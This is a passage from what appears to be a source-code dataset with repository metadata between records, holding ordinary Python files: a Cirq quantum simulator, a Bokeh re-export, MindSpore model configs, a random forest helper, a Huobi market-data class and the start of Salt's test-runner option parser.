Note also that simulations can be stochastic, i.e. return different results
for different runs. The first version of this occurs for measurements,
where the results of the measurement are recorded. This can also
occur when the circuit has mixtures of unitaries.
See `Simulator` for the definitions of the supported methods.
"""
def __init__(self,
*,
dtype: Type[np.number] = np.complex64,
seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None):
"""A sparse matrix simulator.
Args:
dtype: The `numpy.dtype` used by the simulation. One of
`numpy.complex64` or `numpy.complex128`.
seed: The random seed to use for this simulator.
"""
if np.dtype(dtype).kind != 'c':
raise ValueError(
'dtype must be a complex type but was {}'.format(dtype))
self._dtype = dtype
self._prng = value.parse_random_state(seed)
def _run(
self,
circuit: circuits.Circuit,
param_resolver: study.ParamResolver,
repetitions: int) -> Dict[str, List[np.ndarray]]:
"""See definition in `cirq.SimulatesSamples`."""
param_resolver = param_resolver or study.ParamResolver({})
resolved_circuit = protocols.resolve_parameters(circuit, param_resolver)
self._check_all_resolved(resolved_circuit)
def measure_or_mixture(op):
return protocols.is_measurement(op) or protocols.has_mixture(op)
if circuit.are_all_matches_terminal(measure_or_mixture):
return self._run_sweep_sample(resolved_circuit, repetitions)
return self._run_sweep_repeat(resolved_circuit, repetitions)
def _run_sweep_sample(
self,
circuit: circuits.Circuit,
repetitions: int) -> Dict[str, List[np.ndarray]]:
for step_result in self._base_iterator(
circuit=circuit,
qubit_order=ops.QubitOrder.DEFAULT,
initial_state=0,
perform_measurements=False):
pass
# We can ignore the mixtures since this is a run method which
# does not return the state.
measurement_ops = [op for _, op, _ in
circuit.findall_operations_with_gate_type(
ops.MeasurementGate)]
return step_result.sample_measurement_ops(measurement_ops,
repetitions,
seed=self._prng)
def _run_sweep_repeat(
self,
circuit: circuits.Circuit,
repetitions: int) -> Dict[str, List[np.ndarray]]:
measurements = {} # type: Dict[str, List[np.ndarray]]
if repetitions == 0:
for _, op, _ in circuit.findall_operations_with_gate_type(
ops.MeasurementGate):
measurements[protocols.measurement_key(op)] = np.empty([0, 1])
for _ in range(repetitions):
all_step_results = self._base_iterator(
circuit,
qubit_order=ops.QubitOrder.DEFAULT,
initial_state=0)
for step_result in all_step_results:
for k, v in step_result.measurements.items():
                    if k not in measurements:
measurements[k] = []
measurements[k].append(np.array(v, dtype=np.uint8))
return {k: np.array(v) for k, v in measurements.items()}
def _simulator_iterator(
self,
circuit: circuits.Circuit,
param_resolver: study.ParamResolver,
qubit_order: ops.QubitOrderOrList,
initial_state: 'cirq.STATE_VECTOR_LIKE',
) -> Iterator:
"""See definition in `cirq.SimulatesIntermediateState`.
If the initial state is an int, the state is set to the computational
basis state corresponding to this state. Otherwise if the initial
state is a np.ndarray it is the full initial state. In this case it
must be the correct size, be normalized (an L2 norm of 1), and
be safely castable to an appropriate dtype for the simulator.
"""
param_resolver = param_resolver or study.ParamResolver({})
resolved_circuit = protocols.resolve_parameters(circuit, param_resolver)
self._check_all_resolved(resolved_circuit)
actual_initial_state = 0 if initial_state is None else initial_state
return self._base_iterator(resolved_circuit,
qubit_order,
actual_initial_state,
perform_measurements=True)
def _base_iterator(
self,
circuit: circuits.Circuit,
qubit_order: ops.QubitOrderOrList,
initial_state: 'cirq.STATE_VECTOR_LIKE',
perform_measurements: bool = True,
) -> Iterator:
qubits = ops.QubitOrder.as_qubit_order(qubit_order).order_for(
circuit.all_qubits())
num_qubits = len(qubits)
qid_shape = protocols.qid_shape(qubits)
qubit_map = {q: i for i, q in enumerate(qubits)}
state = qis.to_valid_state_vector(initial_state,
num_qubits,
qid_shape=qid_shape,
dtype=self._dtype)
if len(circuit) == 0:
yield SparseSimulatorStep(state, {}, qubit_map, self._dtype)
def on_stuck(bad_op: ops.Operation):
return TypeError(
"Can't simulate unknown operations that don't specify a "
"_unitary_ method, a _decompose_ method, "
"(_has_unitary_ + _apply_unitary_) methods,"
"(_has_mixture_ + _mixture_) methods, or are measurements."
": {!r}".format(bad_op))
def keep(potential_op: ops.Operation) -> bool:
# The order of this is optimized to call has_xxx methods first.
return (protocols.has_unitary(potential_op) or
protocols.has_mixture(potential_op) or
protocols.is_measurement(potential_op) or
isinstance(potential_op.gate, ops.ResetChannel))
data = _StateAndBuffer(state=np.reshape(state, qid_shape),
buffer=np.empty(qid_shape, dtype=self._dtype))
for moment in circuit:
measurements = collections.defaultdict(
list) # type: Dict[str, List[int]]
unitary_ops_and_measurements = protocols.decompose(
moment, keep=keep, on_stuck_raise=on_stuck)
for op in unitary_ops_and_measurements:
indices = [qubit_map[qubit] for qubit in op.qubits]
if isinstance(op.gate, ops.ResetChannel):
self._simulate_reset(op, data, indices)
elif protocols.has_unitary(op):
self._simulate_unitary(op, data, indices)
elif protocols.is_measurement(op):
# Do measurements second, since there may be mixtures that
# operate as measurements.
# TODO: support measurement outside the computational basis.
# Github issue:
# https://github.com/quantumlib/Cirq/issues/1357
if perform_measurements:
self._simulate_measurement(op, data, indices,
measurements, num_qubits)
elif protocols.has_mixture(op):
self._simulate_mixture(op, data, indices)
yield SparseSimulatorStep(
state_vector=data.state,
measurements=measurements,
qubit_map=qubit_map,
dtype=self._dtype)
def _simulate_unitary(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int]) -> None:
"""Simulate an op that has a unitary."""
result = protocols.apply_unitary(
op,
args=protocols.ApplyUnitaryArgs(
data.state,
data.buffer,
indices))
if result is data.buffer:
data.buffer = data.state
data.state = result
def _simulate_reset(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int]) -> None:
"""Simulate an op that is a reset to the |0> state."""
if isinstance(op.gate, ops.ResetChannel):
reset = op.gate
# Do a silent measurement.
bits, _ = wave_function.measure_state_vector(
data.state, indices, out=data.state, qid_shape=data.state.shape)
# Apply bit flip(s) to change the reset the bits to 0.
for b, i, d in zip(bits, indices, protocols.qid_shape(reset)):
if b == 0:
continue # Already zero, no reset needed
reset_unitary = _FlipGate(d, reset_value=b)(*op.qubits)
self._simulate_unitary(reset_unitary, data, [i])
def _simulate_measurement(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int],
measurements: Dict[str, List[int]],
num_qubits: int) -> None:
"""Simulate an op that is a measurement in the computational basis."""
# TODO: support measurement outside computational basis.
# Github issue: https://github.com/quantumlib/Cirq/issues/1357
if isinstance(op.gate, ops.MeasurementGate):
meas = op.gate
invert_mask = meas.full_invert_mask()
# Measure updates inline.
bits, _ = wave_function.measure_state_vector(
data.state,
indices,
out=data.state,
qid_shape=data.state.shape,
seed=self._prng)
corrected = [
bit ^ (bit < 2 and mask)
for bit, mask in zip(bits, invert_mask)
]
key = protocols.measurement_key(meas)
measurements[key].extend(corrected)
def _simulate_mixture(self, op: ops.Operation, data: _StateAndBuffer,
indices: List[int]) -> None:
"""Simulate an op that is a mixtures of unitaries."""
probs, unitaries = zip(*protocols.mixture(op))
# We work around numpy barfing on choosing from a list of
# numpy arrays (which is not `one-dimensional`) by selecting
# the index of the unitary.
index = self._prng.choice(range(len(unitaries)), p=probs)
shape = protocols.qid_shape(op) * 2
unitary = unitaries[index].astype(self._dtype).reshape(shape)
result = linalg.targeted_left_multiply(unitary, data.state, indices,
out=data.buffer)
data.buffer = data.state
data.state = result
def _check_all_resolved(self, circuit):
"""Raises if the circuit contains unresolved symbols."""
if protocols.is_parameterized(circuit):
unresolved = [
op for moment in circuit for op in moment
if protocols.is_parameterized(op)
]
raise ValueError(
'Circuit contains ops whose symbols were not specified in '
'parameter sweep. Ops: {}'.format(unresolved))
class SparseSimulatorStep(wave_function.StateVectorMixin,
wave_function_simulator.WaveFunctionStepResult):
"""A `StepResult` that includes `StateVectorMixin` methods."""
def __init__(self, state_vector, measurements, qubit_map, dtype):
"""Results of a step of the simulator.
Args:
            qubit_map: A map from the Qubits in the Circuit to the index
of this qubit for a canonical ordering. This canonical ordering
is used to define the state vector (see the state_vector()
method).
measurements: A dictionary from measurement gate key to measurement
results, ordered by the qubits that the measurement operates on.
"""
super().__init__(measurements=measurements, qubit_map=qubit_map)
self._dtype = dtype
size = np.prod(protocols.qid_shape(self), dtype=int)
self._state_vector = np.reshape(state_vector, size)
def _simulator_state(self
) -> wave_function_simulator.WaveFunctionSimulatorState:
return wave_function_simulator.WaveFunctionSimulatorState(
qubit_map=self.qubit_map,
state_vector=self._state_vector)
def state_vector(self):
"""Return the wave function at this point in the computation.
The state is returned in the computational basis with these basis
states defined by the qubit_map. In particular the value in the
qubit_map is the index of the qubit, and these are translated into
binary vectors where the last qubit is the 1s bit of the index, the
second-to-last is the 2s bit of the index, and so forth (i.e. big
endian ordering).
Example:
qubit_map: {QubitA: 0, QubitB: 1, QubitC: 2}
Then the returned vector will have indices mapped to qubit basis
states like the following table
| | QubitA | QubitB | QubitC |
| :-: | :----: | :----: | :----: |
| 0 | 0 | 0 | 0 |
| 1 | 0 | 0 | 1 |
| 2 | 0 | 1 | 0 |
| 3 | 0 | 1 | 1 |
| 4 | 1 | 0 | 0 |
| 5 | 1 | 0 | 1 |
| 6 | 1 | 1 | 0 |
| 7 | 1 | 1 | 1 |
"""
return self._simulator_state().state_vector
def set_state_vector(self, state: 'cirq.STATE_VECTOR_LIKE'):
update_state = qis.to_valid_state_vector(state,
len(self.qubit_map),
qid_shape=protocols.qid_shape(
self, None),
dtype=self._dtype)
np.copyto(self._state_vector, update_state)
def sample(self,
qubits: List[ops.Qid],
repetitions: int = 1,
seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None) -> np.ndarray:
indices = [self.qubit_map[qubit] for qubit in qubits]
return wave_function.sample_state_vector(self._state_vector,
indices,
qid_shape=protocols.qid_shape(
self, None),
repetitions=repetitions,
seed=seed)
| 45.657895
| 80
| 0.604131
|
f4263c819d6af239aa4e65d1b1fdc01963728454
| 379
|
py
|
Python
|
bokeh/models/widgets/panels.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 445
|
2019-01-26T13:50:26.000Z
|
2022-03-18T05:17:38.000Z
|
bokeh/models/widgets/panels.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 242
|
2019-01-29T15:48:27.000Z
|
2022-03-31T22:09:21.000Z
|
bokeh/models/widgets/panels.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 31
|
2019-03-10T09:51:27.000Z
|
2022-02-14T23:11:12.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
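# Re-export Panel and Tabs from ..layouts for backwards compatibility; the
# trailing "Panel, Tabs" expression marks the imported names as used so that
# linters do not flag the import as unused.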
from ..layouts import Panel, Tabs; Panel, Tabs
| 42.111111
| 78
| 0.430079
|
3bc099ce47b7d45f221636fb4d8f41d2d640b48c
| 3,192
|
py
|
Python
|
model_zoo/official/nlp/cpm/src/config.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | 1
|
2021-07-03T06:52:20.000Z
|
2021-07-03T06:52:20.000Z
|
model_zoo/official/nlp/cpm/src/config.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
model_zoo/official/nlp/cpm/src/config.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Configure"""
from easydict import EasyDict as ed
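# Each config below is an EasyDict of model and parallelism hyperparameters.
# Interpretation (not stated in the original): 'dp' and 'mp' appear to denote the
# data-parallel and model-parallel degrees, and 'rank_size' the total number of
# devices (dp * mp).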
config_zero_shot_standalone = ed({
"dp": 1,
"mp": 1,
"batch_size": 1,
"rank_size": 1,
"vocab_size": 30000,
'seq_length': 571,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
config_zero_shot_distrubute = ed({
"dp": 1,
"mp": 2,
"batch_size": 2,
"rank_size": 2,
"vocab_size": 30000,
'seq_length': 571,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_dev_standalone = ed({
"dp": 1,
"mp": 1,
"batch_size": 1,
"rank_size": 1,
"vocab_size": 30000,
'seq_length': 696,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_dev_distrubute = ed({
"dp": 1,
"mp": 2,
"batch_size": 1,
"rank_size": 2,
"vocab_size": 30000,
'seq_length': 696,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_test_standalone = ed({
"dp": 1,
"mp": 1,
"batch_size": 1,
"rank_size": 1,
"vocab_size": 30000,
'seq_length': 666,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_test_distrubute = ed({
"dp": 1,
"mp": 2,
"batch_size": 1,
"rank_size": 2,
"vocab_size": 30000,
'seq_length': 666,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
config_train_single_machine = ed({
"dp": 4,
"mp": 2,
"epoch": 10,
"batch_size": 16,
"rank_size": 8,
"vocab_size": 30000,
'seq_length': 725,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32,
"lr": 1e-5,
"eps": 1e-8,
"dropout": 0.2,
"end_learning_rate": 1e-7,
"weight_decay": 1e-2,
"warmup_steps": 0.05,
"power": 1.0,
"grad_accumulation_step": 4,
"sink_size": 1
})
config_train_multi_machine = ed({
"dp": 16,
"mp": 2,
"epoch": 10,
"batch_size": 128,
"rank_size": 32,
"vocab_size": 30000,
'seq_length': 725,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32,
"lr": 2e-5,
"eps": 1e-8,
"dropout": 0.1,
"end_learning_rate": 1e-7,
"weight_decay": 1e-2,
"warmup_steps": 0.1,
"power": 1.0,
"grad_accumulation_step": 1,
"sink_size": 1
})
| 24
| 79
| 0.572055
|
34052b82e1eb2b65ed6e360048332319e5ef6be7
| 1,080
|
py
|
Python
|
public/public/TypDe/training/models/random_forest_classifier.py
|
jsperezsalazar2001/TypDe_GUI
|
4b6e2d3de14d79888d0baf91c57bb5a874e3e28e
|
[
"MIT"
] | null | null | null |
public/public/TypDe/training/models/random_forest_classifier.py
|
jsperezsalazar2001/TypDe_GUI
|
4b6e2d3de14d79888d0baf91c57bb5a874e3e28e
|
[
"MIT"
] | null | null | null |
public/public/TypDe/training/models/random_forest_classifier.py
|
jsperezsalazar2001/TypDe_GUI
|
4b6e2d3de14d79888d0baf91c57bb5a874e3e28e
|
[
"MIT"
] | null | null | null |
from sklearn.ensemble import RandomForestClassifier
from sklearn.base import clone
import numpy as np
import matplotlib.pyplot as plt
def createModel(n_estimators, random_state):
random_forest = RandomForestClassifier(n_estimators=n_estimators, random_state=random_state)
return random_forest
def fit(model, x_train, y_train):
model = clone(model).fit(x_train, y_train)
variables = model.feature_importances_
return model, variables
def predict(model, x_test):
result = model.predict(x_test)
return result
def showImportantColumns(columns, variables):
columns_len = len(columns)
indices = np.argsort(variables)[::-1]
for f in range(columns_len):
print("%2d) %-*s %f" % (f + 1, 30, columns[indices[f]], variables[indices[f]]), indices[f])
plt.title('Feature Importance')
plt.bar(range(columns_len), variables[indices], align='center')
plt.xticks(range(columns_len), columns[indices], rotation=90)
plt.xlim([-1, columns_len])
plt.tight_layout()
# plt.savefig('images/04_09.png', dpi=300)
plt.show()
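# A hedged end-to-end sketch of the helpers above on a toy dataset; the choice of
# scikit-learn's iris data and the 70/30 split are illustrative assumptions, not
# something prescribed by this module.
if __name__ == '__main__':
    from sklearn.datasets import load_iris
    from sklearn.model_selection import train_test_split
    from sklearn.metrics import accuracy_score

    iris = load_iris()
    x_train, x_test, y_train, y_test = train_test_split(
        iris.data, iris.target, test_size=0.3, random_state=42)

    # Build, fit and evaluate the forest through the wrappers defined above.
    model = createModel(n_estimators=100, random_state=42)
    model, variables = fit(model, x_train, y_train)
    predictions = predict(model, x_test)
    print('accuracy:', accuracy_score(y_test, predictions))

    # Feature names are passed as a numpy array so they can be fancy-indexed.
    showImportantColumns(np.array(iris.feature_names), variables)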
| 31.764706
| 99
| 0.72037
|
fb1d5eb496a43a294b7114972bb0dfa5256e5bdf
| 122
|
py
|
Python
|
leo/test/external_files/at-auto-section-ref-test.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 1,550
|
2015-01-14T16:30:37.000Z
|
2022-03-31T08:55:58.000Z
|
leo/test/external_files/at-auto-section-ref-test.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 2,009
|
2015-01-13T16:28:52.000Z
|
2022-03-31T18:21:48.000Z
|
leo/test/external_files/at-auto-section-ref-test.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 200
|
2015-01-05T15:07:41.000Z
|
2022-03-07T17:05:01.000Z
|
# ~/at-auto-test.py
# This is valid Python, but it looks like a section reference.
c = b = d = 0
a = b << c >> d
# end.
| 15.25
| 62
| 0.581967
|
46cc2346cbf3f766ef5f5f18c8184f3dd9a562f2
| 917
|
py
|
Python
|
huobi/model/mbpevent.py
|
xiaohuid/huobi_Python
|
ebc84b2fc560f77fd77457f36ff91906c43646e3
|
[
"Apache-2.0"
] | 1
|
2020-12-28T07:04:45.000Z
|
2020-12-28T07:04:45.000Z
|
huobi/model/mbpevent.py
|
xiaohuid/huobi_Python
|
ebc84b2fc560f77fd77457f36ff91906c43646e3
|
[
"Apache-2.0"
] | null | null | null |
huobi/model/mbpevent.py
|
xiaohuid/huobi_Python
|
ebc84b2fc560f77fd77457f36ff91906c43646e3
|
[
"Apache-2.0"
] | 1
|
2022-03-27T10:36:04.000Z
|
2022-03-27T10:36:04.000Z
|
from huobi.constant.result import OutputKey
from huobi.impl.utils.channelparser import ChannelParser
from huobi.model import *
class MbpEvent:
"""
    Incremental update of the price depth.
    :member
        symbol: The symbol you subscribed to.
        timestamp: The UNIX timestamp generated by the server, in UTC.
data: The price depth.
"""
def __init__(self):
self.symbol = ""
self.ch = ""
self.ts = 0
self.data = Mbp()
@staticmethod
def json_parse(json_wrapper):
ch = json_wrapper.get_string(OutputKey.KeyChannelCh)
parse = ChannelParser(ch)
mbp_event = MbpEvent()
mbp_event.symbol = parse.symbol
mbp_event.ts = json_wrapper.get_int("ts")
mbp_event.ch = ch
data = json_wrapper.get_object(OutputKey.KeyTick)
mbp = Mbp.json_parse(data)
mbp_event.data = mbp
return mbp_event
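# Hedged usage sketch: MbpEvent objects are normally produced by json_parse from a
# websocket callback payload. For a quick test one can also be assembled by hand;
# the channel string below follows the usual Huobi MBP naming and is an assumption,
# not something defined in this file.
#
#     event = MbpEvent()
#     event.symbol = "btcusdt"
#     event.ch = "market.btcusdt.mbp.20"
#     event.ts = 1608292385300
#     print(event.symbol, event.ts)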
| 26.2
| 75
| 0.636859
|
8f2d1bf6e2ef3e083385bead5bda6904b9fb5364
| 39,392
|
py
|
Python
|
tests/runtests.py
|
johnj/salt
|
b23656fa5ee24047c43ac702d6796a700570f749
|
[
"Apache-2.0"
] | 5
|
2017-02-07T05:39:29.000Z
|
2020-06-13T02:07:33.000Z
|
tests/runtests.py
|
johnj/salt
|
b23656fa5ee24047c43ac702d6796a700570f749
|
[
"Apache-2.0"
] | 86
|
2017-01-27T11:54:46.000Z
|
2020-05-20T06:25:26.000Z
|
tests/runtests.py
|
johnj/salt
|
b23656fa5ee24047c43ac702d6796a700570f749
|
[
"Apache-2.0"
] | 11
|
2017-01-26T19:36:29.000Z
|
2021-12-11T07:54:16.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Discover all instances of unittest.TestCase in this directory.
'''
# pylint: disable=file-perms
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import warnings
import collections
TESTS_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
if os.name == 'nt':
TESTS_DIR = TESTS_DIR.replace('\\', '\\\\')
CODE_DIR = os.path.dirname(TESTS_DIR)
# Let's inject CODE_DIR so salt is importable if not there already
if '' in sys.path:
sys.path.remove('')
if TESTS_DIR in sys.path:
sys.path.remove(TESTS_DIR)
if CODE_DIR in sys.path and sys.path[0] != CODE_DIR:
sys.path.remove(CODE_DIR)
if CODE_DIR not in sys.path:
sys.path.insert(0, CODE_DIR)
if TESTS_DIR not in sys.path:
sys.path.insert(1, TESTS_DIR)
try:
import tests
if not tests.__file__.startswith(CODE_DIR):
print('Found tests module not from salt in {}'.format(tests.__file__))
sys.modules.pop('tests')
module_dir = os.path.dirname(tests.__file__)
if module_dir in sys.path:
sys.path.remove(module_dir)
del tests
except ImportError:
pass
# Import salt libs
try:
from tests.support.paths import TMP, SYS_TMP_DIR, INTEGRATION_TEST_DIR
from tests.support.paths import CODE_DIR as SALT_ROOT
except ImportError as exc:
try:
import tests
print('Found tests module not from salt in {}'.format(tests.__file__))
except ImportError:
print('Unable to import salt test module')
print('PYTHONPATH:', os.environ.get('PYTHONPATH'))
print('Current sys.path:')
import pprint
pprint.pprint(sys.path)
raise exc
from tests.integration import TestDaemon, TestDaemonStartFailed # pylint: disable=W0403
from tests.multimaster import MultimasterTestDaemon
import salt.utils.platform
if not salt.utils.platform.is_windows():
import resource
# Import Salt Testing libs
from tests.support.parser import PNUM, print_header
from tests.support.parser.cover import SaltCoverageTestingParser
XML_OUTPUT_DIR = os.environ.get(
'SALT_XML_TEST_REPORTS_DIR',
os.path.join(TMP, 'xml-test-reports')
)
HTML_OUTPUT_DIR = os.environ.get(
'SALT_HTML_TEST_REPORTS_DIR',
os.path.join(TMP, 'html-test-reports')
)
TEST_DIR = os.path.dirname(INTEGRATION_TEST_DIR)
try:
if SALT_ROOT:
os.chdir(SALT_ROOT)
except OSError as err:
print('Failed to change directory to salt\'s source: {0}'.format(err))
# Soft and hard limits on max open filehandles
MAX_OPEN_FILES = {
'integration': {
'soft_limit': 3072,
'hard_limit': 4096,
},
'unit': {
'soft_limit': 1024,
'hard_limit': 2048,
},
}
# Combine info from command line options and test suite directories. A test
# suite is a python package of test modules relative to the tests directory.
TEST_SUITES_UNORDERED = {
'unit':
{'display_name': 'Unit',
'path': 'unit'},
'kitchen':
{'display_name': 'Kitchen',
'path': 'kitchen'},
'multimaster':
{'display_name': 'Multimaster',
'path': 'multimaster'},
'module':
{'display_name': 'Module',
'path': 'integration/modules'},
'state':
{'display_name': 'State',
'path': 'integration/states'},
'cli':
{'display_name': 'CLI',
'path': 'integration/cli'},
'client':
{'display_name': 'Client',
'path': 'integration/client'},
'doc':
{'display_name': 'Documentation',
'path': 'integration/doc'},
'ext_pillar':
{'display_name': 'External Pillar',
'path': 'integration/pillar'},
'grains':
{'display_name': 'Grains',
'path': 'integration/grains'},
'shell':
{'display_name': 'Shell',
'path': 'integration/shell'},
'runners':
{'display_name': 'Runners',
'path': 'integration/runners'},
'renderers':
{'display_name': 'Renderers',
'path': 'integration/renderers'},
'returners':
{'display_name': 'Returners',
'path': 'integration/returners'},
'ssh-int':
{'display_name': 'SSH Integration',
'path': 'integration/ssh'},
'spm':
{'display_name': 'SPM',
'path': 'integration/spm'},
'loader':
{'display_name': 'Loader',
'path': 'integration/loader'},
'outputter':
{'display_name': 'Outputter',
'path': 'integration/output'},
'fileserver':
{'display_name': 'Fileserver',
'path': 'integration/fileserver'},
'wheel':
{'display_name': 'Wheel',
'path': 'integration/wheel'},
'api':
{'display_name': 'NetAPI',
'path': 'integration/netapi'},
'cloud_provider':
{'display_name': 'Cloud Provider',
'path': 'integration/cloud/clouds'},
'minion':
{'display_name': 'Minion',
'path': 'integration/minion'},
'reactor':
{'display_name': 'Reactor',
'path': 'integration/reactor'},
'proxy':
{'display_name': 'Proxy',
'path': 'integration/proxy'},
'external_api':
{'display_name': 'ExternalAPIs',
'path': 'integration/externalapi'},
'daemons':
{'display_name': 'Daemon',
'path': 'integration/daemons'},
'scheduler':
{'display_name': 'Scheduler',
'path': 'integration/scheduler'},
'sdb':
{'display_name': 'Sdb',
'path': 'integration/sdb'},
'logging':
{'display_name': 'Logging',
'path': 'integration/logging'},
}
TEST_SUITES = collections.OrderedDict(sorted(TEST_SUITES_UNORDERED.items(),
key=lambda x: x[0]))
class SaltTestsuiteParser(SaltCoverageTestingParser):
support_docker_execution = True
support_destructive_tests_selection = True
source_code_basedir = SALT_ROOT
def _get_suites(self, include_unit=False, include_cloud_provider=False,
include_proxy=False, include_kitchen=False, include_multimaster=False):
'''
        Return the set of all test suites, excluding unit, cloud provider,
        proxy, kitchen and multimaster tests unless explicitly requested
'''
suites = set(TEST_SUITES.keys())
if not include_unit:
suites -= set(['unit'])
if not include_cloud_provider:
suites -= set(['cloud_provider'])
if not include_proxy:
suites -= set(['proxy'])
if not include_kitchen:
suites -= set(['kitchen'])
if not include_multimaster:
suites -= set(['multimaster'])
return suites
def _check_enabled_suites(self, include_unit=False,
include_cloud_provider=False,
include_proxy=False,
include_kitchen=False,
include_multimaster=False):
'''
Query whether test suites have been enabled
'''
suites = self._get_suites(include_unit=include_unit,
include_cloud_provider=include_cloud_provider,
include_proxy=include_proxy,
include_kitchen=include_kitchen,
include_multimaster=include_multimaster)
return any([getattr(self.options, suite) for suite in suites])
def _enable_suites(self, include_unit=False, include_cloud_provider=False,
include_proxy=False, include_kitchen=False, include_multimaster=False):
'''
Enable test suites for current test run
'''
suites = self._get_suites(include_unit=include_unit,
include_cloud_provider=include_cloud_provider,
include_proxy=include_proxy,
include_kitchen=include_kitchen,
include_multimaster=include_multimaster)
for suite in suites:
setattr(self.options, suite, True)
def setup_additional_options(self):
self.add_option(
'--sysinfo',
default=False,
action='store_true',
help='Print some system information.'
)
self.add_option(
'--transport',
default='zeromq',
choices=('zeromq', 'tcp'),
help=('Select which transport to run the integration tests with, '
'zeromq or tcp. Default: %default')
)
self.add_option(
'--interactive',
default=False,
action='store_true',
help='Do not run any tests. Simply start the daemons.'
)
self.output_options_group.add_option(
'--no-colors',
'--no-colours',
default=False,
action='store_true',
help='Disable colour printing.'
)
self.test_selection_group.add_option(
'-m',
'--module',
'--module-tests',
dest='module',
default=False,
action='store_true',
help='Run tests for modules'
)
self.test_selection_group.add_option(
'-S',
'--state',
'--state-tests',
dest='state',
default=False,
action='store_true',
help='Run tests for states'
)
self.test_selection_group.add_option(
'-C',
'--cli',
'--cli-tests',
dest='cli',
default=False,
action='store_true',
help='Run tests for cli'
)
self.test_selection_group.add_option(
'-c',
'--client',
'--client-tests',
dest='client',
default=False,
action='store_true',
help='Run tests for client'
)
self.test_selection_group.add_option(
'-d',
'--doc',
'--doc-tests',
dest='doc',
default=False,
action='store_true',
help='Run tests for documentation'
)
self.test_selection_group.add_option(
'-I',
'--ext-pillar',
'--ext-pillar-tests',
dest='ext_pillar',
default=False,
action='store_true',
help='Run ext_pillar tests'
)
self.test_selection_group.add_option(
'-G',
'--grains',
'--grains-tests',
dest='grains',
default=False,
action='store_true',
help='Run tests for grains'
)
self.test_selection_group.add_option(
'-s',
'--shell',
'--shell-tests',
dest='shell',
default=False,
action='store_true',
help='Run shell tests'
)
self.test_selection_group.add_option(
'-r',
'--runners',
'--runner-tests',
dest='runners',
default=False,
action='store_true',
help='Run salt/runners/*.py tests'
)
self.test_selection_group.add_option(
'-R',
'--renderers',
'--renderer-tests',
dest='renderers',
default=False,
action='store_true',
help='Run salt/renderers/*.py tests'
)
self.test_selection_group.add_option(
'--reactor',
dest='reactor',
default=False,
action='store_true',
help='Run salt/reactor/*.py tests'
)
self.test_selection_group.add_option(
'--minion',
'--minion-tests',
dest='minion',
default=False,
action='store_true',
help='Run tests for minion'
)
self.test_selection_group.add_option(
'--returners',
dest='returners',
default=False,
action='store_true',
help='Run salt/returners/*.py tests'
)
self.test_selection_group.add_option(
'--spm',
dest='spm',
default=False,
action='store_true',
help='Run spm integration tests'
)
self.test_selection_group.add_option(
'-l',
'--loader',
'--loader-tests',
dest='loader',
default=False,
action='store_true',
help='Run loader tests'
)
self.test_selection_group.add_option(
'-u',
'--unit',
'--unit-tests',
dest='unit',
default=False,
action='store_true',
help='Run unit tests'
)
self.test_selection_group.add_option(
'-k',
'--kitchen',
'--kitchen-tests',
dest='kitchen',
default=False,
action='store_true',
help='Run kitchen tests'
)
self.test_selection_group.add_option(
'--fileserver',
'--fileserver-tests',
dest='fileserver',
default=False,
action='store_true',
help='Run Fileserver tests'
)
self.test_selection_group.add_option(
'-w',
'--wheel',
'--wheel-tests',
dest='wheel',
action='store_true',
default=False,
help='Run wheel tests'
)
self.test_selection_group.add_option(
'-o',
'--outputter',
'--outputter-tests',
dest='outputter',
action='store_true',
default=False,
help='Run outputter tests'
)
self.test_selection_group.add_option(
'--cloud-provider',
'--cloud-provider-tests',
dest='cloud_provider',
action='store_true',
default=False,
help=('Run cloud provider tests. These tests create and delete '
'instances on cloud providers. Must provide valid credentials '
'in salt/tests/integration/files/conf/cloud.*.d to run tests.')
)
self.test_selection_group.add_option(
'--ssh',
'--ssh-tests',
dest='ssh',
